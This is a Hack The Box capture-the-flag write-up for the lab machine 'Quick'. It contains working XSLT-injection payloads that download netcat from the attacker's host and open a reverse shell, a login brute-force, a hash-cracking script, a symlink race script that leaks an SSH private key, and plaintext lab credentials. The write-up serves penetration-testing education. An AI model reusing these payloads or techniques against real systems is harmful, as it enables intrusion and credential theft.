Hackthebox Quick Writeup

Information:~$

Title	Details
Name	Quick
IP	10.10.10.186
Difficulty	Hard
Points	40
OS	Linux

Brief:~$

Quick is Hard Rated Linux box. Intial Nmap UDP scan reveals a PORT 443 running HTTP/3 Using quiche to make a request to quick.htb and we get a pdf file and a password. Using WFUZZ on login page we get right email from the custom email-list. After login on Capturing the request give us a information about the Esigate on which the web-app is based. Exploiting the service with XSLT-Injection to gain Initial Foothold. Reading some internal files gives us information about a subdomain printerv2.quick.htb and a login name and password which can be used on subdomain giving us access to printing functionality which can be exploited to do priv esecusing which we get private-ssh keys for user srvadm And reviewing the ~/.cache dir we got file contains a url with has a password in it url-decode and login as root

Reconnaisance:~$

Nmap Scan:~$

TCP Scan:~$

 nmap -sC -sV -oN nmap/initial 10.10.10.186

# Nmap 7.80 scan initiated Tue May 19 10:10:41 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.186
Nmap scan report for quick.htb (10.10.10.186)
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 19 10:12:52 2020 -- 1 IP address (1 host up) scanned in 131.89 seconds

UDP Scan:~$

nmap -sC -sU -oN nmap/udpscan 10.10.10.186

# Nmap 7.80 scan initiated Thu May 21 12:01:36 2020 as: nmap -sC -sU -p 443 -oN nmap/udpscan 10.10.10.186
Nmap scan report for quick.htb (10.10.10.186)
Host is up (1.1s latency).

PORT    STATE         SERVICE
443/udp open|filtered https

# Nmap done at Thu May 21 12:02:17 2020 -- 1 IP address (1 host up) scanned in 40.81 seconds

We get 3 ports open 22(SSH), 9001(HTTP), 443(HTTPS)

In this case Port 443 is ruuning on HTTP/3 as it is in UDP

Let’s Start with Port 9001

Not much We got a Login page and Clients page and Few Potential users

 ~/htb/boxes/Quick >> ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://quick.htb:9001/FUZZ.php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://quick.htb:9001/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

index                   [Status: 200, Size: 3351, Words: 354, Lines: 126]
home                    [Status: 200, Size: 86, Words: 2, Lines: 1]
search                  [Status: 200, Size: 1, Words: 1, Lines: 2]
login                   [Status: 200, Size: 4345, Words: 451, Lines: 209]
clients                 [Status: 200, Size: 2698, Words: 234, Lines: 112]
db                      [Status: 200, Size: 0, Words: 1, Lines: 1]
ticket                  [Status: 200, Size: 86, Words: 2, Lines: 1]

Nothing New

Move onto Port 443

To access HTTP/3 Protocol we are going to use Quic Protocol

There are 2 ways to do it

1. We can Use Quiche From Cloudfare
2. Docker Image of curl compiled with quiche/0.2.0 for HTTP/3 Support

Method 1:~$

Git clone and install quiche and follow the instruction to make a request https://quick.htb

~/Downloads/quiche >> cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify  https:/quick.htb/
Finished dev [unoptimized + debuginfo] target(s) in 0.22s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/'`

<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>

Let’s try to access these pages

contact

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<h1>Quick | Contact</h1>

<div class="container">
  <form action="/">
    <label for="fname">First Name</label>
    <input type="text" id="fname" name="firstname" placeholder="Your name..">

    <label for="lname">Last Name</label>
    <input type="text" id="lname" name="lastname" placeholder="Your last name..">

    <label for="country">Country</label>
    <select id="country" name="country">
      <option value="australia">Australia</option>
      <option value="canada">Canada</option>
      <option value="usa">USA</option>
    </select>

    <label for="subject">Subject</label>
    <textarea id="subject" name="subject" placeholder="Write something.." style="height:200px"></textarea>

    <input type="submit" value="Submit">
  </form>
</div>

</body>
</html>

about

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>

<div class="about-section">
  <h1>Quick | About Us </h1>
</div>

<h2 style="text-align:center">Our Team</h2>
<div class="row">
  <div class="column">
    <div class="card">
      <img src="/w3images/team1.jpg" alt="Jane" style="width:100%">
      <div class="container">
        <h2>Jane Doe</h2>
        <p class="title">CEO & Founder</p>
        <p>Quick Broadband services established in 2012 by Jane.</p>
        <p>jane@quick.htb</p>
      </div>
    </div>
  </div>

  <div class="column">
    <div class="card">
      <img src="/w3images/team2.jpg" alt="Mike" style="width:100%">
      <div class="container">
        <h2>Mike Ross</h2>
        <p class="title">Sales Manager</p>
        <p>Manages the sales and services.</p>
        <p>mike@quick.htb</p>
      </div>
    </div>
  </div>
  
  <div class="column">
    <div class="card">
      <img src="/w3images/team3.jpg" alt="John" style="width:100%">
      <div class="container">
        <h2>John Doe</h2>
        <p class="title">Web Designer</p>
        <p>Front end developer.</p>
        <p>john@quick.htb</p>
      </div>
    </div>
  </div>
</div>

</body>
</html>

docs

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>

Look’s Like we got something let’s grab these PDF’s

cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify  https:/quick.htb/docs/Connectivity.pdf >> quick.pdf

cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify  https:/quick.htb/docs/QuickStart.pdf >> quick2.pdf

And After going through PDF’s we can find password

Method 2:~$

Fetch Docker Image and Login into Docker as root

sudo docker run --net host --privileged -it --rm ymuski/curl-http3 /bin/bash

Run the below steps to Get the above files

curl --http3 https://portal.quick.htb/

curl --http3 https://portal.quick.htb/index.php?view=contact

curl --http3 https://portal.quick.htb/index.php?view=about

curl --http3 https://portal.quick.htb/index.php?view=docs

curl --http3 https://portal.quick.htb/docs/Connectivity.pdf -o quick.pdf

curl --http3 https://portal.quick.htb/docs/QuickStart.pdf -o quick2.pdf

Enumeration:~$

We have a password: Quick4cc3$$

If we can have email id also we can login to port 9001

You remember we got potential users on Port 9001

Also We got their Comapnies and their countries

Make a list of all possible emails keeping in mind they are corporations

You can try manually one bye one or just use wfuzz to bruteforce the login

 ~/htb/boxes/Quick/webwuic >> wfuzz -w user.lst -X POST -u 'http://quick.htb:9001/login.php' -d 'email=FUZZ&password=Quick4cc3$$' --hc 200 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://quick.htb:9001/login.php
Total requests: 19

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                              
===================================================================

000000013:   302        0 L      0 W      0 Ch        "elisa@wink.co.uk"                                                                                   

Total time: 1.544700
Processed Requests: 19
Filtered Requests: 18
Requests/sec.: 12.30011

Hurray We got email and password Now we can login to quick.htb:9001/login.php

elisa@wink.co.uk:Quick4cc3$$

Initial Foothold:~$

After taking a quick look around we can see that we have a functionality to raise a ticket and search for our ticket nothing more

Let’s check for Headers

HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Via: 1.1 localhost (Apache-HttpClient/4.5.2 (cache))
X-Powered-By: Esigate
Content-Length: 6214

We get an interesting Header X-Powered-By: Esigate

Therefore we can you ESI Injection. You can find an amazing article on it Here

RCE thorugh XSLT:~$

Therefore we can inject xsl file using ticket functionaltiy

Let’s create 3 different xsl files

1. For downloading nc on machine
2. Changing Permissions of nc
3. Triggering Reverse Shell

Launch a Python server on your machine where the files are located

Payload of all the files

Wget

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://10.10.14.166:8000/nc -O vnc]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

chmod

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[chmod 777 vnc]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

shell

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[./vnc -e /bin/sh 10.10.14.166 9001 ]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

You can use 3 blank xml file

So our Final Payload will be

Inject all the 3 Payloads and search for their ticket number to trigger them

Final Payload

Python Server It shows our injection is Successfull

 ~/htb/boxes/Quick/xsl >> python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.186 - - [25/May/2020 09:52:56] "GET /wget2.xsl HTTP/1.1" 200 -
10.10.10.186 - - [25/May/2020 09:52:57] "GET /wget2.xml HTTP/1.1" 200 -
10.10.10.186 - - [25/May/2020 09:52:58] "GET /nc HTTP/1.1" 200 -
10.10.10.186 - - [25/May/2020 09:55:32] "GET /chod.xsl HTTP/1.1" 200 -
10.10.10.186 - - [25/May/2020 09:55:33] "GET /chod.xml HTTP/1.1" 200 -
10.10.10.186 - - [25/May/2020 09:56:00] "GET /shell2.xsl HTTP/1.1" 200 -
10.10.10.186 - - [25/May/2020 09:56:01] "GET /shell2.xml HTTP/1.1" 200 -

And we get shell sam on listner

 ~/htb/boxes/Quick >> nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.166] from (UNKNOWN) [10.10.10.186] 40126
python -c 'import pty;pty.spawn("/bin/bash")' 
sam@quick:~$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam)
sam@quick:~$ wc -c user.txt
wc -c user.txt
33 user.txt
sam@quick:~$ 

Enumeration:~$

sam -> srvadm

After doing some Enumeration I found Database Creds in /var/www/html

sam@quick:/var/www/html$ cat db.php
cat db.php
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>
sam@quick:/var/www/html$

sam@quick:/var/www/html$ mysql -u db_adm -p
mysql -u db_adm -p
Enter password: db_p4ss

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 20
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.01 sec)
mysql> use quick;
use quick;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)

mysql> 

We get a hash for srvadm seems to be md5 After wasting time to decrypt it When I saw login.php in ‘/var/www/html’ I founded some salting is being used in it to encrypt it

sam@quick:/var/www/html$ cat login.php
cat login.php
<?php 
include("db.php");
if(isset($_POST["email"]) && isset($_POST["password"]))
{
  $email=$_POST["email"];
  $password = $_POST["password"];
  $password = md5(crypt($password,'fa'));
[REDACTED]

So I wrote a short php script to dcode the hash implementing same logic

<?php
$handle = fopen("/usr/share/wordlists/rockyou.txt", "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) 
    {
      $pass= "e626d51f8fbfd1124fdea88396c35d05";
        $Password= MD5(crypt($line,'fa'))        
        if($pass==$Password)
        {
          echo "Hash Cracked Password is: "$line;
        }  
    }

    fclose($handle);
} 
else {
    // 
    echo "error opening the file.";
} 
?>

On running the script we get the password yl51pbx

Now while doing enumertaion we got a printer dir /var/www

Let’s check host file

sam@quick:/etc/apache2/sites-enabled$ cat 000-default.conf
cat 000-default.conf
<VirtualHost *:80>
  # The ServerName directive sets the request scheme, hostname and port that
  # the server uses to identify itself. This is used when creating
  # redirection URLs. In the context of virtual hosts, the ServerName
  # specifies what hostname must appear in the request's Host: header to
  # match this virtual host. For the default virtual host (this file) this
  # value is not decisive as it is used as a last resort host regardless.
  # However, you must set it for any further virtual host explicitly.
  #ServerName www.example.com

  ServerAdmin webmaster@localhost
  DocumentRoot /var/www/html

  # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
  # error, crit, alert, emerg.
  # It is also possible to configure the loglevel for particular
  # modules, e.g.
  #LogLevel info ssl:warn

  ErrorLog ${APACHE_LOG_DIR}/error.log
  CustomLog ${APACHE_LOG_DIR}/access.log combined

  # For most configuration files from conf-available/, which are
  # enabled or disabled at a global level, it is possible to
  # include a line for only one particular virtual host. For example the
  # following line enables the CGI configuration for this host only
  # after it has been globally disabled with "a2disconf".
  #Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
  AssignUserId srvadm srvadm
  ServerName printerv2.quick.htb
  DocumentRoot /var/www/printer
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
sam@quick:/etc/apache2/sites-enabled$ 

And the subdomain we got is printerv2.quick.htb . apache2 service running on port 80 and since there was no any remote port:80 opened.so the service is running locally.

I forwarded the port 80 to my localhost and added a entry of subdomain printerv2.quick.htb to my /etc/hosts file

[vibhu@parrot]─[~/HTB/boxes/ROOTED/Quick]$ ssh -i ~/.ssh/id_rsa -L 80:127.0.0.1:80 sam@quick.htb

And now i can access the localhost:80 and the subdomain too.

On connecting we get a login screen

Login using srvadm@quick.htb:yl51pbx

This is a basic site with some add-printer functionality.

If we go back to our shell . We can see some files are there in printers dir.

sam@quick:/var/www/printer$ ls
add_printer.php  css  db.php  escpos-php  favicon.ico  fonts  home.php  images  index.php  job.php  printers.php

There is a file called job.php. which has a race conditions in it.

<?php
require __DIR__ . '/escpos-php/vendor/autoload.php';
use Mike42\Escpos\PrintConnectors\NetworkPrintConnector;
use Mike42\Escpos\Printer;
include("db.php");
session_start();

if($_SESSION["loggedin"])
{
  if(isset($_POST["submit"]))
  {
    $title=$_POST["title"];
    $file = date("Y-m-d_H:i:s");
    file_put_contents("/var/www/jobs/".$file,$_POST["desc"]);
    chmod("/var/www/printer/jobs/".$file,"0777");
    $stmt=$conn->prepare("select ip,port from jobs");
    $stmt->execute();
    $result=$stmt->get_result();
    if($result->num_rows > 0)
    {
      $row=$result->fetch_assoc();
      $ip=$row["ip"];
      $port=$row["port"];
      try
      {
        $connector = new NetworkPrintConnector($ip,$port);
        sleep(0.5); //Buffer for socket check
        $printer = new Printer($connector);
        $printer -> text(file_get_contents("/var/www/jobs/".$file));
        $printer -> cut();
        $printer -> close();
        $message="Job assigned";
        unlink("/var/www/jobs/".$file);
      }
      catch(Exception $error) 
      {
        $error="Can't connect to printer.";
        unlink("/var/www/jobs/".$file);
      }
    }
    else
    {
      $error="Couldn't find printer.";
    }
  }
?>

Whats happening here is It is making a file with current timestamp name and sending it to print on port and IP specified in add-printer functionality

So what we can do is create a symlink to read ssh keys of srvadm therefore I am going to create a script and run it on loop

#!/bin/sh
cd /var/www/jobs;
while true;
do
        for file in $(ls .);
        do
                rm -rf $file;
                ln -s /home/srvadm/.ssh/id_rsa $file;
        done
done

Run the script and let’s create a printer

No go to http://printerv2.quick.htb/job.php and print

and we are done

[vibhu@parrot]─[~/HTB/boxes/ROOTED/Quick]$ nc -nvlp 9100
listening on [any] 9100 ...
connect to [10.10.14.166] from (UNKNOWN) [10.10.10.186] 50790
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
1L2WOskWoyZzGqb8r94gN9TXW8TRlz7hMqq2jfWBgGm3YVzMKYSYsWi6dVYTlVGY
DLNb/88agUQGR8cANRis/2ckWK+GiyTo5pgZacnSN/61p1Ctv0IC/zCOI5p9CKnd
whOvbmjzNvh/b0eXbYQ/Rp5ryLuSJLZ1aPrtK+LCnqjKK0hwH8gKkdZk/d3Ofq4i
hRiQlakwPlsHy2am1O+smg0214HMyQQdn7lE9QIDAQABAoIBAG2zSKQkvxgjdeiI
ok/kcR5ns1wApagfHEFHxAxo8vFaN/m5QlQRa4H4lI/7y00mizi5CzFC3oVYtbum
Y5FXwagzZntxZegWQ9xb9Uy+X8sr6yIIGM5El75iroETpYhjvoFBSuedeOpwcaR+
DlritBg8rFKLQFrR0ysZqVKaLMmRxPutqvhd1vOZDO4R/8ZMKggFnPC03AkgXkp3
j8+ktSPW6THykwGnHXY/vkMAS2H3dBhmecA/Ks6V8h5htvybhDLuUMd++K6Fqo/B
H14kq+y0Vfjs37vcNR5G7E+7hNw3zv5N8uchP23TZn2MynsujZ3TwbwOV5pw/CxO
9nb7BSECgYEA5hMD4QRo35OwM/LCu5XCJjGardhHn83OIPUEmVePJ1SGCam6oxvc
bAA5n83ERMXpDmE4I7y3CNrd9DS/uUae9q4CN/5gjEcc9Z1E81U64v7+H8VK3rue
F6PinFsdov50tWJbxSYr0dIktSuUUPZrR+in5SOzP77kxZL4QtRE710CgYEAz+It
T/TMzWbl+9uLAyanQObr5gD1UmG5fdYcutTB+8JOXGKFDIyY+oVMwoU1jzk7KUtw
8MzyuG8D1icVysRXHU8btn5t1l51RXu0HsBmJ9LaySWFRbNt9bc7FErajJr8Dakj
b4gu9IKHcGchN2akH3KZ6lz/ayIAxFtadrTMinkCgYEAxpZzKq6btx/LX4uS+kdx
pXX7hULBz/XcjiXvKkyhi9kxOPX/2voZcD9hfcYmOxZ466iOxIoHkuUX38oIEuwa
GeJol9xBidN386kj8sUGZxiiUNoCne5jrxQObddX5XCtXELh43HnMNyqQpazFo8c
Wp0/DlGaTtN+s+r/zu9Z8SECgYEAtfvuZvyK/ZWC6AS9oTiJWovNH0DfggsC82Ip
LHVsjBUBvGaSyvWaRlXDaNZsmMElRXVBncwM/+BPn33/2c4f5QyH2i67wNpYF0e/
2tvbkilIVqZ+ERKOxHhvQ8hzontbBCp5Vv4E/Q/3uTLPJUy5iL4ud7iJ8SOHQF4o
x5pnJSECgYEA4gk6oVOHMVtxrXh3ASZyQIn6VKO+cIXHj72RAsFAD/98intvVsA3
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VA[vibhu@parrot]─[~/HTB/boxes/ROOTED/Quick]$

we got private-ssh-keys for user srvadm

Login as srvadm

[vibhu@parrot]─[~/HTB/boxes/ROOTED/Quick]$ ssh -i id_rsa srvadm@quick.htb
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jul  8 08:54:16 UTC 2020

  System load:  1.24               Users logged in:                1
  Usage of /:   30.1% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 16%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    127


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul  8 08:32:00 2020 from 10.10.14.166
srvadm@quick:~$ id && whoami
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm
srvadm@quick:~$

srvadm -> root

After doing some enumeration we gat a .cache din srvadm dir and printers.conf in conf.d in it

srvadm@quick:~/.cache/conf.d$ ls -la
total 20
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20 06:23 .
drwx------ 5 srvadm srvadm 4096 Mar 20 06:20 ..
-rw-r--r-- 1 srvadm srvadm 4569 Mar 20 06:20 cupsd.conf
-rw-r--r-- 1 srvadm srvadm 4038 Mar 20 06:23 printers.conf
srvadm@quick:~/.cache/conf.d$ 

On reading the content of printers.conf we can find a line

DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer

On decoding this url we get plain text

https://srvadm@quick.htb:&ftQ4K3SGde8?@printerv3.quick.htb/printer

The &ftQ4K3SGde8? is the password for root user.

[vibhu@parrot]─[~/HTB/boxes/ROOTED/Quick]$ sshpass -p  "&ftQ4K3SGde8?" ssh root@quick.htb
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 2.0


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul  8 08:59:41 2020 from 10.10.14.166
root@quick:~# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root
root@quick:~# wc -c root.txt 
33 root.txt
root@quick:~# 

Resources:~$

Topic	Link
XSLT Injection	Here
Quic Docker	Here
Cloudfare Quiche	Here

With this, we come to the end of the story of how I owned Quick 😃

Thank you for reading !!!

I would love to hear about any suggestions or queries.